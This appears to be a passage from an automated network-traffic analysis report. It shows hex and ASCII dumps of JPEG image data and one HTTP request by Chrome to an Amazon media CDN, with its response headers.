                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 d5 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 06 00 04 05 07 01 03 08 02 09 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e9 dd 9a b6 e3 79 f3 b0 59 09 76 d7 4c aa
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4yYvL
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: d9 af 11 f2 be c4 ae 71 5d 73 24 18 07 29 35 41 ba 49 a6 c5 86 44 e9 49 f9 2a 9d 2b 38 4d d3 26 96 db 02 c9 f9 b8 8e da 40 33 ee 6a ac 8b 4a 9f e9 e6 e0 5b f0 59 c5 89 8b 64 e2 58 49 f6 e5 20 27 49 f3 55 b3 73 63 72 27 4b 73 55 9b 24 e3 76 4d 1e 4a 55 e8 3f b9 f9 37 d5 9d e1 62 7c ea e9 e3 8e f6 78 94 42 78 08 27 ea ae aa 6a eb 96 d5 d2 4a 2a 95 09 a4 7b 85 ae 86 2d 5a 68 f4 fa 1b bb d2 73 9f 2c 4a 4a bc 07 f5 b0 31 ca bd 47 cc 92 92 f6 a7 22 74 5c da 72 04 59 10 ea cc 44 91 8d 2b 13 b8 79 36 4a 69 6b be a8 a8 7c 94 bc 02 7c 1a 35 46 f3 4d 9c e7 76 17 68 55 b6 d5 c7 ca bf 39 92 ab 2c 4e e6 02 9b 12 bd 29 68 14 ed a0 57 91 28 d2 1e 9d b1 14 d6 89 be 29 a0 f2 e2 e4 99 34 83 bc ea 16 15 d1 41 53 10 20 70 33 9d 25 94 58 59 5a 4a 22 1f 25 1e 9e 89 07 ca 57 67
                                                                                                                                                                                          Data Ascii: q]s$)5AIDI*+8M&@3jJ[YdXI 'IUscr'KsU$vMJU?7b|xBx'jJ*{-Zhs,JJ1G"t\rYD+y6Jik||5FMvhU9,N)hW()4AS p3%XYZJ"%Wg
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 04 01 03 03 03 03 03 04 03 01 01 00 00 01 02 03 00 04 11 12 05 13 21 31 10 14 22 23 32 41 15 20 30 33 40 51 16 24 34 61 06 42 52 43 53 ff da 00 08 01 01 00 01 08 02 fd 99 fe d0 1c f8 ac fe 3d 01 cf 8f 42 71 e4 90 31 9e aa 9f 40 c1 b3 8f db 77 1e c1 4d 04 6e 94 41 99 9e 4f 21 e4 64 62 43 b0 72 d4 25 93 a4 cf 5b be 6a 27 76 71 b4 d2 c8 cb 8a bd 07 59 23 56 9a 4d dc 09 65 91 1f b4 93 ca a1 b0 4b 24 cc 6a 1d a3 84 60 cb 28 5c d3 cd 30 db 00 ba bc ba ef 2e 68 f5 19 e3 d9 9a 50 f8 03 aa 80 ea cc 59 65 50 37 0e 58 00 ef 1f d4 41 28 38 31 f5 c8 4c ed 31 af af da a2 ea 6c 36 85 1d 0c 86 b6 9f 18 a8 d2 4c 9c 45 bf 7d ff 00 67 5f ea 69 5d 74 a3 74 33 1e a9 28 90 90 be e1 0e 29 ee 40 0a 56 69 b4 c6 16 e1 48 19 59 f2 64 a4 9d 0e 05 3d c6 0e 00 99 0e 2b dc fc 98 57 5d
                                                                                                                                                                                          Data Ascii: !1"#2A 03@Q$4aBRCS=Bq1@wMnAO!dbCr%[j'vqY#VMeK$j`(\0.hPYeP7XA(81L1l6LE}g_i]tt3()@ViHYd=+W]
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 05 91 a3 c1 57 5b 84 da 37 5a 07 20 1f e7 bc 4e a4 32 a8 e2 be 9c e2 9a 7f 99 c0 bd 90 b5 74 1e fa e1 8a fa 73 0f d5 8f 61 69 0b 0d 82 34 0d a1 de 3d 4f cd a0 b7 3e 4a 93 24 b8 06 e0 86 06 ac af ba e1 43 fe cb 8b 8c 3a c2 b3 dd fb 6f a6 cb 75 d6 71 b5 97 21 d6 49 d5 a1 3f 05 1f ce 2a ff 00 8d 8a 24 37 01 79 11 0a fd 6f 7a b2 21 45 b0 bf 8a 78 d9 51 33 aa e7 90 bc 16 e9 5c d2 85 5b 78 53 dd 34 50 17 a9 67 9e ec e9 42 25 2d a5 4f 27 44 0a f6 32 3a ae 6e 62 68 1b 0d c6 45 ee 18 62 37 12 00 c2 9e 60 b4 67 2e 75 16 ec 25 bd 98 d5 df 1a af de bf 4d ab 18 86 5f 1d 13 1f 62 2e 0a 95 a8 a5 12 8c 8f e5 b9 b9 ea 96 8c e7 a7 b4 64 da 98 44 84 58 ae 24 43 50 48 f3 45 f3 96 28 8b 40 25 e7 5f 52 5a 9a d1 db 08 b2 1e 9a 61 5a 1e 96 d8 e4 6f 12 14 88 db 7b e9 fb d4 b7 4f
                                                                                                                                                                                          Data Ascii: W[7Z N2tsai4=O>J$C:ouq!I?*$7yoz!ExQ3\[xS4PgB%-O'D2:nbhEb7`g.u%M_b.dDX$CPHE(@%_RZaZo{O
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: d5 ad b4 97 b2 61 79 04 86 dd 3e 50 5e 89 42 35 72 dc 73 c2 cd 28 50 09 00 9e 4c 76 0a 2f 65 93 0a a1 ba f3 77 12 79 27 ee 35 14 08 4f 76 8b 53 5c 35 af b6 37 2e f7 92 fb 9b 07 92 b3 5b 52 cd 8a 8e f7 4a 9e f8 b2 f6 b7 e4 a4 42 33 17 26 a6 a3 bf 56 c0 45 7f 58 27 89 e1 8d a6 9b 91 ec 56 14 9b be c4 33 4a 4e 22 e0 f3 de 49 ac c2 6c eb 03 98 0a ad 08 e6 57 d9 67 73 d5 73 51 ca a3 b9 bc 9c 49 a8 4a b5 b6 92 e5 f4 44 48 f8 d8 75 5b 8e 45 d8 9d 43 bc 64 b2 f1 dc a8 97 e9 c9 7b c1 6d f3 b7 c1 42 e4 bc ba 76 55 f8 ef 88 fe 93 62 ba a3 60 42 32 79 a9 1f 24 d7 13 71 2b 17 a9 a3 10 43 7d 0d 76 ae d5 a8 ad 28 c4 47 7a c7 a4 17 0d 11 ca c1 2d c9 40 7d 00 cf 61 72 de dc ac 49 2c ab 27 70 31 56 32 29 4e 92 47 6f 3b f7 30 58 88 5b 35 75 f4 a4 31 9b 77 75 5c 0b f9 5e 46
                                                                                                                                                                                          Data Ascii: ay>P^B5rs(PLv/ewy'5OvS\57.[RJB3&VEX'V3JN"IlWgssQIJDHu[ECd{mBvUb`B2y$q+C}v(Gz-@}arI,'p1V2)NGo;0X[5u1wu\^F
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: d9 91 cf a1 5a f3 dc 45 0a ca 2a 2b 39 01 ef 74 f8 01 6a 4e e2 95 3a 23 b8 93 2a 45 42 9d 59 2d 85 6e 1d ae 6a e7 c9 ad 71 e7 75 1f 6c b2 89 d7 6f 5c d7 7a c1 ac 52 47 db 35 22 bc 07 b8 90 2d 45 c4 92 32 ed c4 13 9a f6 17 56 92 2c 81 d5 65 05 4b 71 7e d6 4d d1 79 2f ac cb 33 24 77 04 52 29 98 7c e7 f8 36 b5 23 99 7b 9e 32 c0 af d4 7e b2 e3 2b 7b 2c 59 cd 11 b1 3e 83 34 0f 7c 82 52 4f 3f 6f 8f 3d ea 21 af c9 9c d2 29 73 aa d9 1e 90 69 2a d1 be ea b8 1d df d3 52 3d 47 7a d7 34 1c 03 9a 66 d8 8d 61 11 ea fd 50 ff 00 8a 17 2e 9f 6d b2 a9 41 52 4c f3 1c ba 5d cd 17 db ef ee 33 9a b7 e6 67 8c fc ad f9 78 65 c0 a6 0b 27 96 b6 07 b0 1c 72 a8 6c 5b f1 70 c4 5f 44 e2 d5 19 5d 45 f2 be f5 c8 dd 83 36 d1 b9 fc d7 50 8a f1 5b 57 77 ae 8e bf 79 54 01 4a 0e e7 27 7c d1
                                                                                                                                                                                          Data Ascii: ZE*+9tjN:#*EBY-njqulo\zRG5"-E2V,eKq~My/3$wR)|6#{2~+{,Y>4|RO?o=!)si*R=Gz4faP.mARL]3gxe'rl[p_D]E6P[WwyTJ'|
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 11 a4 4a 19 e7 88 a1 15 0d c4 7d 38 aa 49 90 ad c8 a6 9e 17 6c d4 6f 1c 8b 93 c8 f7 71 4a 68 dc 6c fa 0d bf 01 d8 ae 05 4f 76 22 46 8d 6d 66 db 0a 27 97 a6 84 92 7b 57 27 6a 55 c3 24 36 82 15 ea 49 2c 86 56 2c 71 4a 07 e4 8f c5 12 7b d4 0b b3 d2 da 40 c9 57 f6 c2 16 1a 57 03 07 79 25 ae 69 f3 2a a8 ab 8b c9 2e b4 2e 0e 69 d1 8a 92 47 9a d3 15 63 30 58 90 52 5c 20 3d ed ee 93 a6 8a 7d c4 63 bd 45 22 87 91 ab af 1e e9 5d 74 31 b1 a9 cc 42 22 06 61 da ad de 21 14 55 c9 eb b7 d3 44 cd 59 b8 6c 90 36 72 4b 3b 60 16 3c af 69 6a d2 73 1e 71 71 75 d4 d1 6a 23 5d 31 e0 5e dd 99 7b 15 15 a8 34 eb 8f 15 a9 3e 21 25 18 11 10 54 41 99 e0 46 52 4b c6 bd ca f1 89 d3 b7 4c 72 89 f5 cd 6b 8a 05 57 ce 36 ce b0 5b 23 77 6e 3c 08 77 35 1c 88 15 6b ac 94 25 4c 40 0c d3 47 ae
                                                                                                                                                                                          Data Ascii: J}8IloqJhlOv"Fmf'{W'jU$6I,V,qJ{@WWy%i*..iGc0XR\ =}cE"]t1B"a!UDYl6rK;`<ijsqquj#]1^{4>!%TAFRKLrkW6[#wn<w5k%L@G
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 05 0c 14 fb 33 a0 8a 2e 8e 4e 4a 7d c2 08 e0 af 9d 0f 41 d8 21 90 86 a7 03 61 80 86 83 f1 cf 49 45 72 c9 c9 e8 3a 1c 37 51 43 61 86 47 2d d4 57 2d 19 fa 9b 07 52 8a 6d 5b 23 52 c8 32 fb 2f 97 64 1d 3b a6 d4 a3 d6 17 16 c7 ff c4 00 43 10 00 01 02 04 01 08 08 04 04 05 04 01 05 01 00 00 01 00 11 02 21 31 41 51 03 10 12 32 61 71 81 a1 20 22 42 91 b1 c1 d1 f0 52 a2 e1 f1 13 30 62 92 40 72 82 b2 e2 23 33 53 d2 c2 04 43 50 63 93 a3 ff da 00 08 01 01 00 09 3f 02 ff 00 e0 2e 8d db 8e 19 ad d2 87 4b 44 d3 11 17 56 21 dd 3e 0a b0 e5 32 63 17 d0 8b 5b 8d 54 37 c9 cf 46 7d 5c af a7 59 06 3a 14 b8 33 f7 ec 2b 8f fd 3d b7 bf 77 24 3a da 0f a3 b5 a8 78 a6 a0 34 33 77 71 79 8f 35 21 a2 65 50 ef 8a 85 a7 3d 8d 18 1c e1 9a a7 e0 65 1a 10 2f 6f b2 02 ed 15 a9 09 1d e4 9f da
                                                                                                                                                                                          Data Ascii: 3.NJ}A!aIEr:7QCaG-W-Rm[#R2/d;C!1AQ2aq "BR0b@r#3SCPc?.KDV!>2c[T7F}\Y:3+=w$:x43wqy5!eP=e/o
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 80 4f 61 0e 8c b4 a3 bd 8d 13 34 e4 ff 00 a8 45 0f 21 c1 5f 25 95 87 f7 b3 28 ba a6 cf 3d 50 2b b0 cf 8b a3 d5 ff 00 52 5a 47 b4 41 87 b9 16 7f c2 df d4 24 9e fa 28 a7 27 38 b6 cd b7 be d4 cc f1 f3 2e 3e bf 97 48 82 a6 c5 75 4c 9c e7 47 c7 85 94 52 c5 6b e4 98 83 48 b8 ec 2a e3 c7 a4 59 3f 72 3c 7f 88 0f a1 c9 ed c1 1e b6 18 2f 84 2c a6 8c f5 86 22 4b 27 1c 62 32 1e 3c 77 2c a1 88 90 64 70 45 c0 00 3e ee 8f 64 15 35 34 1b 6a ec f9 ff 00 04 3a 36 39 83 c0 2f 70 8b 83 94 3f 38 fa 2c b4 32 c7 25 a6 4f bd 8c a2 32 05 e3 ba a7 46 85 6c 6d ca 45 11 14 bb 95 63 25 fc 1b f8 1a 9a 43 75 00 1c 1f 9a e7 08 52 8c 77 1c f7 8c f9 2a cb 4c e2 7d 02 3f 5f ba 8b 54 48 61 8a 28 eb 0f 6f d3 8b 47 4c 43 31 5e aa 8f 49 c6 34 51 f5 a1 b7 aa 90 31 83 b6 af fc 05 00 55 8c ac 94
                                                                                                                                                                                          Data Ascii: Oa4E!_%(=P+RZGA$('8.>HuLGRkH*Y?r</,"K'b2<w,dpE>d54j:69/p?8,2%O2FlmEc%CuRw*L}?_THa(oGLC1^I4Q1U
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 18 30 ed d6 dd 9a ea a1 4e 13 76 72 a4 7e 52 8b 68 d4 60 a6 36 d5 5d f3 cf 13 86 f4 4c 79 56 ea 97 98 e1 6f 34 35 9a 62 8f e4 a7 04 47 f6 be 28 f1 50 3b 70 59 3d 13 bd 09 41 84 d6 25 0a aa 66 3a 92 ee eb 14 2b ff 00 6e 8c 55 51 52 f5 45 87 79 3f cd 17 a2 bf 42 20 e3 bc 8a 2a 17 77 f1 0a b8 b2 ef 51 f0 1e aa 26 20 4d e8 ca 0a d2 6d 55 91 86 1d 8e c4 f9 20 ce 67 09 92 84 0f d3 75 ab 08 cc 1c f2 1b 4a 99 fe e2 99 cd d1 20 ec 92 94 bf 72 fd 9e 8a 44 5a eb 5a 2e 43 6a ab ac 17 d2 6a b8 66 8e 4e 0c 50 b3 e9 3c 9d fd ba 32 1a 26 11 fc d3 ce 51 e8 e4 a2 ce 7f db a9 fd 57 ee a2 83 44 ec 32 ee cd 01 8c d4 81 c9 01 92 fe e4 49 8b 14 1c 58 3c 94 5d fd 66 53 6e d0 0c f9 ef cb 6a e2 6e 77 a9 c7 15 07 c2 13 13 f0 dd 43 e7 9f 5c 50 fa a8 48 8d e7 8a fa 95 74 69 9f e0 37
                                                                                                                                                                                          Data Ascii: 0Nvr~Rh`6]LyVo45bG(P;pY=A%f:+nUQREy?B *wQ& MmU guJ rDZZ.CjjfNP<2&QWD2IX<]fSnjnwC\PHti7


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          79192.168.2.1649811151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:08 UTC445OUTGET /images/M/MV5BNzEzM2IxY2EtZjc0MS00ODYwLTgzMGEtMTNjY2EwYzViYmFhXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:09 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 29138
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 658738cd-9d18-4efe-a350-150b38ffed20
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 31 Aug 2017 19:53:21 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Wed, 07 Dec 2044 13:20:40 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:09 GMT
                                                                                                                                                                                          Age: 253049
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200137-IAD, cache-ewr-kewr1740042-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c3 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 00 06 03 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 06 07 04 05 08 09 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e5 d6 83 37 2c 20 90 b0 de e0 d5 86 c4
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"57,
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 11 0a 67 e5 5b d9 b2 9d 7b e2 b2 b8 4c eb 6c 1e c9 d4 ab 3d b6 55 c4 8d b9 e6 d7 5c f4 54 9a 6f 67 d5 92 ca 3b 93 a1 b0 4a d7 80 18 04 b3 6d a1 2d d9 ba fd 96 2c 59 ac 77 1b aa c7 f4 3b ca cf 54 73 8e 18 8e 74 60 87 1b 6b b6 1a c9 bb dd 03 ce 32 b2 f9 bd 39 2e d2 89 e8 4a 5a 41 cb ea b9 a9 db c4 66 de 99 65 d7 16 35 72 f2 8a 51 18 cb d3 7c de 80 e6 79 96 f9 48 a1 91 fd 4d 6b 30 7b 4d b5 bb 49 2e 6f 5f 11 0f 4e 5e 2e 12 46 0e 06 60 13 25 e1 cd f6 8a d4 96 8c ec f2 33 c4 ce bb d1 0f 3b 31 28 f4 96 01 3a e7 1a d6 86 c5 c8 c1 9b e3 ad 22 22 c0 ed 5e 39 ea b5 ec 1e 39 ec 8e 5e 56 a1 cf d1 ca 67 a6 7b d7 5e 76 e0 bb 22 b9 38 8f df cb 4e 2b 9b f4 44 73 f6 af ef 46 f3 4d fb c6 6e af 61 89 11 11 c1 de e8 f9 ec 02 5d a0 cd 0f 1b cb c3 56 d6 b7 8e c7 3a 5f 92 2b 7c
                                                                                                                                                                                          Data Ascii: g[{Ll=U\Tog;Jm-,Yw;Tst`k29.JZAfe5rQ|yHMk0{MI.o_N^.F`%3;1(:""^99^Vg{^v"8N+DsFMna]V:_+|
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 05 12 10 13 21 31 06 14 20 22 32 23 30 33 41 40 42 24 51 53 52 25 50 61 ff da 00 08 01 01 00 01 08 02 cd 66 b3 59 ac d6 7e c6 6b 35 9e 19 ac d6 6b 35 9a cd 66 b3 59 ac d6 6b 35 9a cd 66 b3 59 ac d6 6b 35 9f 54 30 3c e7 11 f0 03 3d 02 d8 bf f7 7b 48 a2 88 b9 fe 4e da db e8 b9 b0 92 d9 55 9d 11 1a 09 4d 59 5c f2 b7 a9 9b e4 c6 ae ac c4 28 ae b6 37 7b 98 47 53 6d 5b 9f a9 2e a4 09 ca b3 6e 24 9f e2 85 ad 9e 9d 39 a3 59 97 9b 75 b7 98 fb 15 e6 bd 8c 29 b9 b5 8a d9 7a cb 1c 88 88 2d 75 49 14 ec 5a 4d 40 a4 6a 95 35 c3 cd d5 ff 00 8a 01 ad 95 8f 5c 5b 77 2e f4 ff 00 cc 77 48 a9 23 05 bb bd f3 0a a2 83 b0 18 e0 c8 50 e1 bf 87 b6 a3 87 75 05 a1 0d 08 85 35 bf fa ed eb 7b a9 5c 61 ab 96 db 43 d5 8d b8 b9 7e 59 b2 b9 f2 d2 c7 2d 5d ff 00 90 e6 48 93 4f 32 26 f5 bf
                                                                                                                                                                                          Data Ascii: !1 "2#03A@B$QSR%PafY~k5k5fYk5fYk5T0<={HNUMY\(7{GSm[.n$9Yu)z-uIZM@j5\[w.wH#Pu5{\aC~Y-]HO2&
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: de db e1 f6 6d ec a6 ba cf 2a 68 1e 06 d9 20 ab 79 96 28 11 ab e9 c7 53 7d 11 ed bf c3 6d 92 91 a6 58 e3 e4 da 23 5c c3 24 73 6a 12 28 81 63 1a 2a 6e b8 15 72 39 40 35 79 b9 56 46 90 5b dd 34 6a d4 1b dd 81 1d 85 d9 76 6b 7d 52 ce 48 36 5c 3d f6 27 89 27 59 cf f8 c8 2a 35 1c 99 08 e1 1d c8 82 0c d4 5a 74 f7 a8 66 a8 3c 35 ff 00 6b 7d 32 de db e1 eb 87 4e 32 db b4 c2 a1 85 e6 6d a9 26 95 73 1e 37 43 a1 cd 2d 44 86 c6 25 8d 75 77 69 61 52 f4 a1 f9 0a a4 dd 08 88 e5 cd 1b c5 d5 2e 03 08 70 d6 77 6d 10 2b 52 6a 0f 38 2a 2e 33 82 5b c3 a4 07 96 b5 8b ee 5a ed 16 b2 53 cc ab da df fd d6 92 fb a2 c5 6b 91 73 2d 25 ad 2e 4d dc c8 4d cf b5 36 d5 98 fa aa 68 69 92 ce df 42 df c3 3f f6 83 4e 82 1c 6d 92 74 8f e7 7b e2 45 8c ed 82 1f 14 4a 0f d5 b4 d4 21 bb 19 4f 4c
                                                                                                                                                                                          Data Ascii: m*h y(S}mX#\$sj(c*nr9@5yVF[4jvk}RH6\=''Y*5Ztf<5k}2N2m&s7C-D%uwiaR.pwm+Rj8*.3[ZSks-%.MM6hiB?Nmt{EJ!OL
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 31 9e c2 bf df 14 f7 28 35 61 2e e5 e1 a8 29 92 5c 52 c7 d1 c5 73 c9 8b 63 ee 23 15 8e 12 ff 00 5a cf c6 a4 f9 1e 01 68 8e c6 80 ef 49 fa a0 b8 a7 1d 7d 56 df 30 28 5a b6 32 cf 0e f2 40 de 8b f1 32 b1 ac d0 86 42 33 4a 85 8e 2b 46 7d d6 b1 57 88 a2 df 6d ba 97 f5 47 b7 1b 03 9f 6d 5a 4e b6 c4 ef 9b 5f 41 f8 e5 be 79 4e 4e fe 18 ad bc 1f b5 03 d2 a4 fe b5 8a c5 0a 14 9d a9 bb 1a 6f 70 cf a5 41 63 81 1c 82 01 88 e1 b9 89 cb f3 f9 bb 3a 23 fb 72 b4 a3 79 02 a3 e4 c1 db 24 f5 32 8d ca 45 78 76 5c ac c9 57 d0 f3 a0 99 2a 2e b4 7f 62 92 26 7e cb 67 ff 00 ad e1 3e 19 f4 07 22 94 ee e2 3a 8a 4c 75 cb f4 58 fd 02 94 d6 70 40 a2 bb 69 d7 69 c7 00 0b 76 58 00 ea fe 60 27 44 c3 4d 9a b5 81 18 b6 e7 70 a3 ad cb 07 91 88 ab 49 b1 ed 0a 70 7d db ab 40 b9 ff 00 28 8e 1c
                                                                                                                                                                                          Data Ascii: 1(5a.)\Rsc#ZhI}V0(Z2@2B3J+F}WmGmZN_AyNNopAc:#ry$2Exv\W*.b&~g>":LuXp@iivX`'DMpIp}@(
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 3a 0c 7b 2d 22 af 13 cb 88 23 4a b5 67 47 12 c6 8e 24 55 75 d4 34 8f 37 34 53 2d 6a 17 e3 cf 73 92 e3 c4 d0 27 e3 9f c4 37 52 fc 64 91 a4 39 7e 2a 70 41 a0 25 3d 85 b6 e1 5b d2 24 c5 24 cd 1a b2 82 c4 80 0f f0 8d 5b 45 ca 8a 24 a9 ad 22 9c ab 48 63 0c a5 2a c3 57 7d 37 74 0e fe 29 8b fa de eb 93 dd 02 bf 60 1c 75 a9 2e 99 9b 2a ee 5f e5 58 fe 2d b6 bf 04 76 f1 73 27 f1 43 9f c5 71 a8 dc 5c fe 4f e0 ed ac 56 2b 1c 71 58 ac 51 1e 9c 56 2b 15 8a c5 62 b1 58 ac 56 2b 15 8a c5 63 d1 8a c5 62 b1 c3 1c 4d 67 d0 3e e7 5a eb 59 ae b5 d7 d2 68 f1 eb 5d 6b ad 75 ae d5 8a c7 0c 51 ae b5 83 5d 7d 38 ac 56 38 62 b1 58 f4 63 86 0d 60 d6 2b 1c 31 47 d1 8a c5 0c 56 05 1a e9 5d 38 62 b1 58 ac 57 4e 1f aa e9 c3 a7 0e 9c 3a 57 4a c5 62 b1 58 e1 d3 87 4a e9 5d 28 e3 f9 5b 3a
                                                                                                                                                                                          Data Ascii: :{-"#JgG$Uu474S-js'7Rd9~*pA%=[$$[E$"Hc*W}7t)`u.*_X-vs'Cq\OV+qXQV+bXV+cbMg>ZYh]kuQ]}8V8bXc`+1GV]8bXWN:WJbXJ]([:
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 4c 96 60 63 67 c2 6b 23 d6 b2 79 69 0b 35 9d 29 0c 95 93 8f ed 7c 07 2c 92 49 c5 1c e3 76 ac ac 23 8b ec c7 77 d4 1e 12 29 b2 38 0d a3 89 11 56 36 0a 9a 63 21 bc 9b 49 e9 85 23 03 11 e0 60 5c 18 7c e2 63 60 f1 84 60 ca f2 3b 41 b5 85 66 a2 50 49 03 4b 3a aa 73 24 d6 ed b6 09 fd 32 57 35 5a a4 65 01 7b 56 0c 03 18 62 b0 18 4d f2 14 fe b0 e5 61 ca a3 89 28 43 79 2d 38 a0 09 5f 04 de 5f b3 75 1c 19 63 1a 8e 0a fd f0 3b 1f 18 32 3e 9f 3c bf 60 fe 2e e7 97 a0 54 e1 02 b8 cb f6 b4 68 bc 64 9a 17 84 02 f0 68 1a 6e 43 74 2a 1c 15 20 d1 fd 64 7d 36 79 7e c4 e8 3c 7f 64 7a 08 61 e5 57 50 3c 1d f8 0e 50 03 1c 76 ae fb 73 4f b3 d4 1b f5 3d 45 66 01 16 0d 51 85 c3 07 ea d1 28 e1 df 73 16 3d 2d 63 64 7b 27 26 d5 d3 6d 41 af 2a c0 3a 1b 5e 56 5a 14 6e a8 82 f6 31 bc 0e
                                                                                                                                                                                          Data Ascii: L`cgk#yi5)|,Iv#w)8V6c!I#`\|c``;AfPIK:s$2W5Ze{VbMa(Cy-8__uc;2><`.ThdhnCt* d}6y~<dzaWP<PvsO=EfQ(s=-cd{'&mA*:^VZn1
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 27 44 2e d3 83 7d 7e cb b2 1c 67 f0 a5 f4 fe a8 7b aa 93 37 ce 38 79 a8 ff 00 98 de e8 d9 20 46 e0 aa 0a ba 12 e8 a4 d8 6f 75 65 ce 88 41 ae 8f 31 ea a1 de 1d ee ef 15 5c aa 46 32 50 8d ed b9 19 e4 d2 e5 c3 64 55 e0 1e 52 f3 46 0d 20 c6 32 ad bc fc 57 01 80 57 2b dc 6c 0a 5b 53 0f ee 32 0b b4 e0 df 53 e8 98 23 89 99 f8 4c ca 82 6e 49 c2 c8 e1 58 19 cf 47 8d e9 dd db 8e be eb e8 ab 3f d4 0c 27 2c 20 8c 4c 61 21 23 0b fd 51 30 35 70 fe dd c1 3b b8 44 09 e7 55 f5 44 ec fc ab 9a 7d 10 98 4e 3e aa 79 77 dd 63 5d fb 81 c9 ea 80 13 a7 7a 75 b3 62 3a 58 5f 0b 66 4d 39 54 a9 92 ed dc 57 69 c1 be bf 64 c9 e2 74 8f c0 ae 54 9b 8c 04 4d 82 25 32 1d 7c 10 e2 4c 3d 55 7d c4 a9 90 ea f8 8b 04 48 07 7b 5a 6a 7d d1 36 97 ae 26 a3 11 e2 b1 8f 55 30 6e 29 a1 a3 9f e5 6b 14
                                                                                                                                                                                          Data Ascii: 'D.}~g{78y FoueA1\F2PdURF 2WW+l[S2S#LnIXG?', La!#Q05p;DUD}N>ywc]zub:X_fM9TWidtTM%2|L=U}H{Zj}6&U0n)k
